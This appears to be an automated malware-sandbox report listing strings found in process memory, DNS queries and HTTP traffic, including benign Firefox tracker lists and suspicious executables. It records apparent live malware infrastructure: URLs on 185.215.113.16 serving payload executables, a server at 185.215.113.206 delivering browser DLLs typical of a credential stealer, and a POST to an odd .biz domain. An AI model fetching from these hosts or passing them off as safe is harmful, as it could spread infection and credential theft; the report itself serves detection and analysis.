Source: firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/Selects which parsing/delazification strategy should be used while parsing scripts off-main-thread. See DelazificationOption in CompileOptions.h for values. equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/Selects which parsing/delazification strategy should be used while parsing scripts off-main-thread. See DelazificationOption in CompileOptions.h for values. equals www.twitter.com (Twitter)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/Selects which parsing/delazification strategy should be used while parsing scripts off-main-thread. See DelazificationOption in CompileOptions.h for values. equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: webcompat@mozilla.org.412316860420webcompat@mozilla.org.412316860420webcompat@mozilla.org.412316860420"https://smartblock.firefox.etp/play.svg"webcompat@mozilla.org.412316860420webcompat@mozilla.org.412316860420://trends.google.com/trends/embedhttps://smartblock.firefox.etp/play.svgwebcompat@mozilla.org.412316860420["://trends.google.com/trends/embed"]webcompat@mozilla.org.412316860420webcompat@mozilla.org.412316860420webcompat@mozilla.org.412316860420["://trends.google.com/trends/embed"]webcompat@mozilla.org.412316860420"://login.microsoftonline.com/"://track.adform.net/serving/scripts/trackpoint/https://smartblock.firefox.etp/facebook.svgwebcompat@mozilla.org.412316860420webcompat@mozilla.org.412316860420"https://smartblock.firefox.etp/facebook.svg"webcompat@mozilla.org.412316860420"://trends.google.com/trends/embed"://trends.google.com/trends/embedwebcompat@mozilla.org.412316860420"://trends.google.com/trends/embed"resource://gre/modules/ExtensionParent.sys.mjswebcompat@mozilla.org.412316860420://www.everestjs.net/static/st.v3.jswebcompat@mozilla.org.412316860420webcompat@mozilla.org.412316860420://cdn.branch.io/branch-latest.min.js*://www.google-analytics.com/plugins/ua/ec.js://web-assets.toggl.com/app/assets/scripts/.js://static.adsafeprotected.com/iasPET.1.js://adservex.media.net/videoAds.js://s.webtrends.com/js/webtrends.min.js://.moatads.com//moatheader.js*://auth.9c9media.ca/auth/main.js://.imgur.io/js/vendor..bundle.js://connect.facebook.net//sdk.js*://ssl.google-analytics.com/ga.js://pub.doubleverify.com/signals/pub.js*://static.chartbeat.com/js/chartbeat.js://libs.coremetrics.com/eluminate.js://c.amazon-adsystem.com/aax2/apstag.js://static.criteo.net/js/ld/publishertag.js://.imgur.com/js/vendor..bundle.js://cdn.adsafeprotected.com/iasPET.1.js://static.chartbeat.com/js/chartbeat_video.js://www.googletagservices.com/tag/js/gpt.js*://cdn.optimizely.com/public/.js://www.google-analytics.com/analytics.js://www.googletagmanager.com/gtm.js://connect.facebook.net//all.js://www.google-analytics.com/gtm/js://imasdk.googleapis.com/js/sdkloader/ima3.js://js.maxmind.com/js/apis/geoip2//geoip2.js://s.webtrends.com/js/advancedLinkTracking.js://s.webtrends.com/js/webtrends.js://pagead2.googlesyndication.com/tag/js/gpt.js://s0.2mdn.net/instream/html5/ima3.js://.vidible.tv//vidible-min.js*://www.rva311.com/static/js/main..chunk.js"://www.everestjs.net/static/st.v3.js""://static.chartbeat.com/js/chartbeat_video.js""://static.criteo.net/js/ld/publishertag.js""://.imgur.com/js/vendor..bundle.js""://.imgur.io/js/vendor..bundle.js""://www.rva311.com/static/js/main..chunk.js""://libs.coremetrics.com/eluminate.js""://connect.facebook.net//sdk.js""://www.google-analytics.com/analytics.js""://www.google-analytics.com/gtm/js""://www.googletagmanager.com/gtm.js"webcompat@mozilla.org.412316860420"://cdn.branch.io/branch-latest.min.js""*://www.google-analytics.com/plugins/
Source: firefox.exe, 00000022.00000002.2902767464.0000019CFE62E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2904062267.0000019CFE7A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893740815.0000019CFD989000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2932386721.00000595B9F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.comZ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2902767464.0000019CFE6D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2932386721.00000595B9F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2935227623.0000333379A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/Z equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2932386721.00000595B9F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.comZ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2893740815.0000019CFD955000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId:

Source: global traffic	DNS traffic detected: DNS query: woo097878781.win
Source: global traffic	DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz

Source: firefox.exe, 00000022.00000002.2902767464.0000019CFE648000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2913522204.0000019CFF59B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2864089087.0000019CED46D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2881255814.0000019CFB200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.2930962305.0000019D06F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: skotes.exe, 00000006.00000002.2954528432.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000006.00000002.2954528432.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exeJ
Source: skotes.exe, 00000006.00000002.2954528432.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exeK
Source: skotes.exe, 00000006.00000002.2954528432.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exed
Source: c92938c010.exe, 00000010.00000002.2943562507.00000000012FB000.00000004.00000010.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000002.2948754234.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: c92938c010.exe, 00000010.00000002.2948754234.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exez$
Source: skotes.exe, 00000006.00000002.2954528432.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: c92938c010.exe, 00000010.00000002.2948754234.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000006.00000002.2954528432.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe-
Source: skotes.exe, 00000006.00000002.2954528432.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeu
Source: skotes.exe, 00000006.00000002.2954528432.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000277000.00000040.00000001.01000000.0000000E.sdmp, 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp, 2bd330404c.exe, 00000011.00000002.2936414035.00000000001DC000.00000040.00000001.01000000.0000000E.sdmp, 2bd330404c.exe, 00000011.00000002.2936414035.00000000001C5000.00000040.00000001.01000000.0000000E.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/796edb33c6972e60283fdd40f1a5672
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll72e60283fdd40f1a5672edDB
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllZ_
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllb_
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/ge
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/hpser
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll:
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll;0
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllB
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllDataUser
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllF_
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllH_
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllT
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001144000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll.
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll2e60283fdd40f1a5672ension
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001144000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll50
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001144000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllL
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp, 2bd330404c.exe, 00000011.00000002.2936414035.00000000001C5000.00000040.00000001.01000000.0000000E.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.00000000011CD000.00000004.00000020.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllData
Source: 2bd330404c.exe, 00000011.00000002.2936414035.00000000001C5000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dlldll
Source: 2bd330404c.exe, 00000011.00000002.2936414035.00000000001C5000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dlldlltable
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllll
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllll&
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllll(
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllser
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllt_
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/rowser
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllData
Source: 2bd330404c.exe, 00000011.00000002.2948007674.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dlle
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllvbnData
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/ware
